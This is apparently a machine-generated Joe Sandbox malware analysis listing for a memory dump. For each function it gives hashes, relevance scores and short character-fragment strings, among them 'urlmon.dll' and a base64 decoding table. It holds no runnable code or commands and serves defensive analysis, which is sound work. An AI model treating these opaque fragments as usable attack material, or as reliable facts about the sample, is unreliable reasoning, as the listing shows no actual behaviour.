                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94a68c089e150b6b9d80349166053ec91d3c341e7f912fc8c0046cafab93dcc0
                        • Instruction ID: da89b8abd1082512b74fd6b2cd612e5f5737d60c3b7efb17341dbb9cd705222f
                        • Opcode Fuzzy Hash: 94a68c089e150b6b9d80349166053ec91d3c341e7f912fc8c0046cafab93dcc0
                        • Instruction Fuzzy Hash: 5621D5B5A04209ABDB14DF98DC81FABB7B9EF89300F104119FA19A7240D774A911CFA5
                        Function 02FE51B3 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84abba341f974abd9d5b245fee970bf457cd13a8266a289abe015e0e65b83c7d
                        • Instruction ID: 2436a4acc1340bf2a060c9a03e9dfe5da48930a9fd225dcc87ba5a944282bb8e
                        • Opcode Fuzzy Hash: 84abba341f974abd9d5b245fee970bf457cd13a8266a289abe015e0e65b83c7d
                        • Instruction Fuzzy Hash: 931186B27802057BF720AA598C42FAB775DDF85B55F244015FB08AE2C1D6A5B8114AF4
                        Function 02FF5823 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58e6bf0c26bf550f00c75b79209cc84edf814af522356a322b2647e30c4852f5
                        • Instruction ID: e05618ea2cb5471e4e2e5578867f23e3d811b85d35aba98d25380b59a7448573
                        • Opcode Fuzzy Hash: 58e6bf0c26bf550f00c75b79209cc84edf814af522356a322b2647e30c4852f5
                        • Instruction Fuzzy Hash: E52118B5A00609ABDB14DF98DC81FABB7A9EF89710F10451DFA19A7240D770A911CFA1
                        Function 02FF4BE3 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ccdf9ee8fe252e156632f20c56bd35016570fae0c10670d610c6e362f3781b9c
                        • Instruction ID: e75a254ecbe377ebe63bf4991c546f87f4314c87a8ac45541867b0f95f988b38
                        • Opcode Fuzzy Hash: ccdf9ee8fe252e156632f20c56bd35016570fae0c10670d610c6e362f3781b9c
                        • Instruction Fuzzy Hash: C0115171A407056BD720EEA8DC41FABB7ADEF85710F10461DFF19A7280D7706911CBA1
                        Function 02FF1CA3 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2da8b0d9d7ceb3b8de3ca10837580c83203493f28c9e406a422b2d92a5ae5936
                        • Instruction ID: f6f3845f4dd4bd7a9d93822c59bc78f0aede290e285b0dbbd03cbbfe3cae2057
                        • Opcode Fuzzy Hash: 2da8b0d9d7ceb3b8de3ca10837580c83203493f28c9e406a422b2d92a5ae5936
                        • Instruction Fuzzy Hash: A011E2B6D11119AF8B40DFE9DD419EFB7F9EF88310F14416AE915E7200E7705A048FA0
                        Function 02FF4D43 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98b641180fee4e253e73fc08c4a36c1cff09e94be09aea2e956be691e925d5f5
                        • Instruction ID: 0f23f5cd041e024ad5d46547ecd6dadf920afec477644a23a563e580fb3efdb1
                        • Opcode Fuzzy Hash: 98b641180fee4e253e73fc08c4a36c1cff09e94be09aea2e956be691e925d5f5
                        • Instruction Fuzzy Hash: 6E115E71A007456BD720EBA8DC41FABB7ADEF85710F14451DFB19A7280EBB06911CBA1
                        Function 02FF5B83 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction ID: 35d5e173add590a843a5abfd9bda71fa20a24310f46b130e2c57c57da4020eb8
                        • Opcode Fuzzy Hash: 3fd48a30e9d0ae253e7c946412751fffa894b6aa8f0fbddb53dac173fcdc2c6c
                        • Instruction Fuzzy Hash: 360180B2214248BBCB54DE99DC81EEB77ADAF8D754F548208FA19E3240D630E951CBA4
                        Function 02FF1C13 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09a76790dbdf74a4f91f7509aa6eb142f9fe10ffc0b7531da95f0af3d44b6ade
                        • Instruction ID: 54d947fb8470f2291df3d8c136d94754ce9f619b54226dc7c600ec1b38eab722
                        • Opcode Fuzzy Hash: 09a76790dbdf74a4f91f7509aa6eb142f9fe10ffc0b7531da95f0af3d44b6ade
                        • Instruction Fuzzy Hash: B501D7B2C01219AF8B40DFE8D9409EEBBF9AB08600F14466EE919F6240F7705A048FA5
                        Function 02FD14EB Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2adbde70e96d360acebc886663f3d057b268337dc9ddd8d671d824a7afd3731c
                        • Instruction ID: 056973747f2eef7ab3998e87061f2b9ba146290e42f69d605578481be14342d5
                        • Opcode Fuzzy Hash: 2adbde70e96d360acebc886663f3d057b268337dc9ddd8d671d824a7afd3731c
                        • Instruction Fuzzy Hash: 21F0B4735142165BE7104A5CEC40B97B79DEB84375F240222FB1D87251D371A4518BA0
                        Function 02FF4E33 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00a062acd090cad76c8390655a6fb8f775ee24b6b59a53b751345efd5b0becfa
                        • Instruction ID: 50b6a12637df4cf8890c8d2b720e2c3b79d87968c03fb43c20779d7ebd063215
                        • Opcode Fuzzy Hash: 00a062acd090cad76c8390655a6fb8f775ee24b6b59a53b751345efd5b0becfa
                        • Instruction Fuzzy Hash: B1F01CB6200209BFD710DF99DC81EAB77ADEFC9750F004109BA18A7240D6B0B911CBB0
                        Function 02FE52D3 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                        • Instruction ID: 19bdb1fb3fc5867581e56b60d60b95b66623fd70ab765a8ee3e1fa648ef38c99
                        • Opcode Fuzzy Hash: 9aa5ea00827451bb388a7f6f2d0daadf3fd91d1fcae7833611f553b3848fad86
                        • Instruction Fuzzy Hash: ABF08271D05208EBDF14CFA8D841BDEBBB5EB04360F104369E9259B280D63497548B81
                        Function 02FF5AA3 Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction ID: b4c2154b54109dc2385691832a92e6c779827c0e00f1dfefd2f42bbe29c93c15
                        • Opcode Fuzzy Hash: e5a46834363e99c52d6815dcfa8bb54489d8a8d2589ec9944ef7440d54d75e6c
                        • Instruction Fuzzy Hash: 4FE06D756042047BC614EE58DC45EEB33ADEFC8710F004409FA09A7240C670B9118AB4
                        Function 02FF7743 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a9d020b962982346de8deb6e798606e13f994b6e67d19b73e68850110c0708e
                        • Instruction ID: c23181f9f89fafe519e0c9e64b6308428c6a2f91e663c78550deec9550c191f4
                        • Opcode Fuzzy Hash: 1a9d020b962982346de8deb6e798606e13f994b6e67d19b73e68850110c0708e
                        • Instruction Fuzzy Hash: 2FE08677A5121937D22075999C05FA7F76DCFC1FA0F090069FF089B350E661B91186E4
                        Function 02FD1566 Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a36d11d7fd2540fc9f8ee9a862e055587441e3092b8664b8cfb1d3091816399b
                        • Instruction ID: db04ccc6b3a6d881776fa958bb39e1f439d5f8e964135f6da3ddb2ec3c19ce7f
                        • Opcode Fuzzy Hash: a36d11d7fd2540fc9f8ee9a862e055587441e3092b8664b8cfb1d3091816399b
                        • Instruction Fuzzy Hash: 35E068333502114BEB410A2CF4C13813F8AEB42B98F4C00E6E34A8FB09D3B2820BCB49
                        Function 02FF5793 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 414a8468d3496c98980228175ae34cdf12bc4d1d24caed385aea7774ca1de8ba
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 2EE046362006047BD220AB69DC02FAB77ADEFC5761F004159FA09A7241DAB1BA028BB0
                        Function 02FD8577 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ef42a7e0b3bbc4e1b7abfccfc2c2a47a97349c232721320cb7feacae2fc59d2
                        • Instruction ID: ac0c70614efdb6398665b9fbe10da960f6c4f82ca1586decfebe6478df8d10ed
                        • Opcode Fuzzy Hash: 4ef42a7e0b3bbc4e1b7abfccfc2c2a47a97349c232721320cb7feacae2fc59d2
                        • Instruction Fuzzy Hash: 6DA002A95D4549650A2371F01E4086A7D4388872E87BD4574B5629C5C7B7C0966464C3

                        Non-executed Functions

                        Function 02FE1545 Relevance: 51.4, Strings: 41, Instructions: 170COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                        • API String ID: 0-3248090998
                        • Opcode ID: 1ab50b9612db4895e64fd0a6cb4f10cfb6190932943f21e96b9daf513ecbafb4
                        • Instruction ID: 9447a0fdf3a87656ca615bf2041a65b5701f582421b10c51f141df59e4599e27
                        • Opcode Fuzzy Hash: 1ab50b9612db4895e64fd0a6cb4f10cfb6190932943f21e96b9daf513ecbafb4
                        • Instruction Fuzzy Hash: 1991ECF08052A98ACB118F55A5607DFBF71BB95204F1581E9C6AA7B203C3BE4E85DF90
                        Function 02FD7803 Relevance: 48.9, Strings: 39, Instructions: 168COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "4$$$*$*:$*G$*z$+$+$-$0$3$4$8U$:-$A$B$C$E$J$Kh$Q$R$RU$SL$Us$V$V$[$bp$k$m$n$p$w$w_$z$,$R$`
                        • API String ID: 0-3217005643
                        • Opcode ID: 10d176fa73f93bcbf9982e1cf877d37eac99d032b458a74a176183b416aac059
                        • Instruction ID: 79cbc950f6d2074c09c770b0cc0b91eeadc39e860151f78986d82c58ec7b2565
                        • Opcode Fuzzy Hash: 10d176fa73f93bcbf9982e1cf877d37eac99d032b458a74a176183b416aac059
                        • Instruction Fuzzy Hash: FDC107B0C06669CBEB608F45D9987DEBAB1BB05308F1081D9C55C3B281D7BA1AC9CF95
                        Function 02FEF263 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                        • API String ID: 0-1002149817
                        • Opcode ID: 0e42941ab3bf7d6bef5090cc89488ecb2000263d690d383cbed5a23b3094fd18
                        • Instruction ID: 3260a2b6a49c8d151e406b19c8e99c53eaaac08ae52872d041498099ca9cb8e6
                        • Opcode Fuzzy Hash: 0e42941ab3bf7d6bef5090cc89488ecb2000263d690d383cbed5a23b3094fd18
                        • Instruction Fuzzy Hash: 26C14FB1D002289EDF61DFA4CD44BEEBBB9AF05344F00819DD64DAB251E7B54A88CF91
                        Function 02FE80E3 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                        • API String ID: 0-392141074
                        • Opcode ID: fc90facbfe9b2ea27073110e3edb82a1ec6a79a474cd4e1e9472ebb62533efd2
                        • Instruction ID: 598a58061237b2132e4be2b4ccb29720f962db05f82c8598dd346f85260740a6
                        • Opcode Fuzzy Hash: fc90facbfe9b2ea27073110e3edb82a1ec6a79a474cd4e1e9472ebb62533efd2
                        • Instruction Fuzzy Hash: D7711FB1D10218AAEB25EB94CC40FEEF77EAF08740F04459DE709AA150EB7067488FA5
                        Function 02FE80DB Relevance: 16.4, Strings: 13, Instructions: 176COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                        • API String ID: 0-392141074
                        • Opcode ID: b31f96973f7884e5c03a87134cc79083df9867b17fe5b29f61557f51757810b9
                        • Instruction ID: a0725e0a535ca7a865978b9706862f0065a1c164dfd31f6473a35a42e2ddd1e6
                        • Opcode Fuzzy Hash: b31f96973f7884e5c03a87134cc79083df9867b17fe5b29f61557f51757810b9
                        • Instruction Fuzzy Hash: CC612FB1D10218AADB65EB94CC40FEEF7BABF08340F04419DE709A6191E7B16748CFA5
                        Function 02FD1193 Relevance: 16.3, Strings: 13, Instructions: 49COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: -6pj$33>p$7-02$:pkk$;0(,$_$i$iqld$jlhq$kolq$lhql$lhqli$qoqm
                        • API String ID: 0-3534071798
                        • Opcode ID: 903f3814e9fb6d44f257ac5f976a666606719df9a63b68e6935ad1674687423e
                        • Instruction ID: eac3db8c66eee9d25eca5bc6b1704d0dc13473bc58e3666ecec77b66a646851f
                        • Opcode Fuzzy Hash: 903f3814e9fb6d44f257ac5f976a666606719df9a63b68e6935ad1674687423e
                        • Instruction Fuzzy Hash: 2F21ECB4C042489ACB10CF96D9806EEFF79FF04704FA4810DE515AF248D7764A12CF9A
                        Function 02FE33E3 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                        • API String ID: 0-2356907671
                        • Opcode ID: 445c3259711e9ab39b125d503ba45c52aa12e1dc7ecb03d05717592d4c10fc9c
                        • Instruction ID: 323af8e5d8d51f53f13e4c31f70c91dc34409585e8a5ad3fab6f61e3b7e06c72
                        • Opcode Fuzzy Hash: 445c3259711e9ab39b125d503ba45c52aa12e1dc7ecb03d05717592d4c10fc9c
                        • Instruction Fuzzy Hash: F88164B2C003186AEB91FBA4CC80FEFB7BEAF44740F044499A709A6151EB755748CF61
                        Function 02FDC25A Relevance: 13.8, Strings: 11, Instructions: 88COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                        • API String ID: 0-685823316
                        • Opcode ID: fb625ca5aa19305b1b817c8a818807cad6de504b48772fbea0ec9ed9931e8049
                        • Instruction ID: f336e6512304d9ecf3b57628f346011a59d70b1f33f4384ed3de0589ae4c9dbc
                        • Opcode Fuzzy Hash: fb625ca5aa19305b1b817c8a818807cad6de504b48772fbea0ec9ed9931e8049
                        • Instruction Fuzzy Hash: 983198B1D5021CAAEF50DFE4DC44BEEBBBABF04740F10415CE608B6180DBB556088FA5
                        Function 02FEFAB3 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: L$S$\$a$c$e$l
                        • API String ID: 0-3322591375
                        • Opcode ID: 0c9e9afee0dd6807c5a44f7a64b06d4d21c5646e75779fdb459341e165a99d60
                        • Instruction ID: d849fd50e8cf29706e7821d0eb05d1c984ce4d8d238f78bc2e16eceec57b7bb5
                        • Opcode Fuzzy Hash: 0c9e9afee0dd6807c5a44f7a64b06d4d21c5646e75779fdb459341e165a99d60
                        • Instruction Fuzzy Hash: 3C41B6B2C10218AADF50EFA8DC84AEEF7B9EF48310F05429EDA09A7110E77156418FD5
                        Function 02FE7EA4 Relevance: 7.7, Strings: 6, Instructions: 174COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: F$P$T$f$r$x
                        • API String ID: 0-2523166886
                        • Opcode ID: 4d0ef4e0d5c41cc09329282f1f9eb520c7f01ea82c3ea48f2329c605a34066df
                        • Instruction ID: 3e2a7f765259ed4a9d374be9d4790af6bb9a142d8a31bbf32833996753015515
                        • Opcode Fuzzy Hash: 4d0ef4e0d5c41cc09329282f1f9eb520c7f01ea82c3ea48f2329c605a34066df
                        • Instruction Fuzzy Hash: DB51B471900304AFDB35EB64CC44BEBF7E9EF04784F04465DA70A96190E7B5A654CF91
                        Function 02FE7600 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $i$l$o$u
                        • API String ID: 0-2051669658
                        • Opcode ID: 0ee0559e7d0f4f09f2745c3314fee7a8ea282b9eba20fa721e46b05d6c3e4b4f
                        • Instruction ID: ac70955db9b5aec673c01313877f5733f1be0170a69d57b79e16efbd51e2af76
                        • Opcode Fuzzy Hash: 0ee0559e7d0f4f09f2745c3314fee7a8ea282b9eba20fa721e46b05d6c3e4b4f
                        • Instruction Fuzzy Hash: 776150B6D00308AFDB25DBA4CC80FEFB7F9AB48750F104559E61AA7240D774AA41CBA0
                        Function 02FE7603 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $i$l$o$u
                        • API String ID: 0-2051669658
                        • Opcode ID: 543f73d77363d5a33ffebd9801305cd2df064c1d40249a3142d6ed056cc4f016
                        • Instruction ID: a618ba7a1fac675f1cdb04bbccadbd839e5f2b19d5b0041ea5064c2f33f17182
                        • Opcode Fuzzy Hash: 543f73d77363d5a33ffebd9801305cd2df064c1d40249a3142d6ed056cc4f016
                        • Instruction Fuzzy Hash: 5B41FAB5D00308AFDB61DBA4CC84FEFBBF9AB48744F104559E65AA7240D774AA41CB60
                        Function 02FE3713 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1$9$t$u$y
                        • API String ID: 0-2863724497
                        • Opcode ID: 2924a4fe0cb18c05cf014b9d6f14f90a15c8f0aa8445d174658ab8ae0de97bb0
                        • Instruction ID: 30f0e08ae9706781e19dc4a72f029b6df88eb37b42c200fb06f9054e07a100c9
                        • Opcode Fuzzy Hash: 2924a4fe0cb18c05cf014b9d6f14f90a15c8f0aa8445d174658ab8ae0de97bb0
                        • Instruction Fuzzy Hash: 24312FB1D14119ABEB00DBA4CC45FFEB7B9EF08344F044199EA08A7250E7B5AA448BE5
                        Function 02FD47E3 Relevance: 6.3, Strings: 5, Instructions: 43COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )$K$s$x${
                        • API String ID: 0-2460612821
                        • Opcode ID: 111d1f20c23030b5e7b94b465d497e89c60a192c8b4b2cc92f808ce588f844ac
                        • Instruction ID: 272a8982c66d92afedfbd32de82dbc68112b28ed6cd9e6625df6da4769b4c959
                        • Opcode Fuzzy Hash: 111d1f20c23030b5e7b94b465d497e89c60a192c8b4b2cc92f808ce588f844ac
                        • Instruction Fuzzy Hash: DB11C910D087CBDDCB22CABD58486AEBF715B23164F0883C9D5F56A2E2C2754706C7A6
                        Function 02FE72A3 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
